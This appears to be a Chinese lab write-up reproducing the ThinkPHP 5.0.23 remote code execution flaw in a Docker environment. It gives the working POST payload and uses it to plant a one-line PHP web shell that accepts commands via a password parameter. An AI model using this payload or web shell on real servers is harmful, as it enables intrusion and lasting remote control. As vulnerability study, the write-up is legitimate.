Thinkphp5.0.23 rce（远程代码执行）的漏洞复现

Thinkphp5.0.23 rce（远程代码执行）的漏洞复现

漏洞形成原因

• 框架介绍： ThinkPHP是一款运用极广的PHP开发框架。
• 漏洞引入： 其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

漏洞如何利用

• 1、访问靶机地址+端口号 进入首页
• 2、Burp抓包修改传参方式为Post，传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"，其中pwd为系统执行命令可进行一系列操作。

漏洞复现过程

• Kali docker 容器中启动此漏洞环境
• 浏览器访问 Kali 的 ip 地址接上8080端口

• Burp抓包修改传参方式为Post，url后接入/index.php?s=captch，传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。

/index.php?s=captch        #url后接

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd    #POST传入参数

• Burp Go
• 尝试写入phpinfo

echo"<?php phpinfo(); ?>"> info.php

• 成功！
• 写入一句话

echo'<?php eval($_POST[aaa]); ?>'> shell.php    #密码：aaa

• 上蚁剑！
• 漏洞复现成功 参考文章：https://www.cnblogs.com/zenb/p/14537240.html 技术萌新，还请各位大牛多多指点！